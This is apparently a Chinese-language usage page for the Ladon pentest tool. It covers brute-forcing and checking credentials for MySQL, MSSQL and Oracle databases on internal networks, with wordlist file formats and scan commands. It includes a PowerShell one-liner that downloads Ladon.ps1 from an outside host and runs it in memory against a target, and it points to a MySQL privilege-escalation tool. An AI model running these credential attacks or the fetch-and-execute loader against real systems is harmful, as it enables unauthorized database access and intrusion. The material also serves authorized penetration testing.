<% Visit %>

3306端口 Mysql数据库密码爆破

Ladon 192.168.1.8/24 MysqlScan

配置密码爆破参数

1 支持标准的user.txt和pass.txt帐密破解，爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt（存放用户名和对应密码）,用于快速验证其它机器是否存在相同帐密
3 支持check.txt（存放IP/端口/库名/用户/密码）,不指定端口和数据库名则使用默认

user.txt和pass.txt分别存放用户、密码
userpass.txt存放用户密码组，即每行存放用户以及密码
check.txt每行存放IP\端口\用户\密码

数据库口令检测

mssql密码验证

(大型内网可能从其它机器收集到大量机器密码，第一步肯定是先验证)
非默认端口请将以下端口改成被修改端口即可，单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan

Oracle同理

192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OrcleScan

Mysql无需指定数据库名

192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MssqlScan

PowerLadon

远程加载MysqlScan 1521端口弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon.ps1'); Ladon 192.168.1.141 MysqlScan”

Kali、Linux、Mac、路由器等操作系统

./Ladon 192.168.1.8/24 MysqlScan

Mysql数据库远程提权工具

工具下载

最新版本：https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases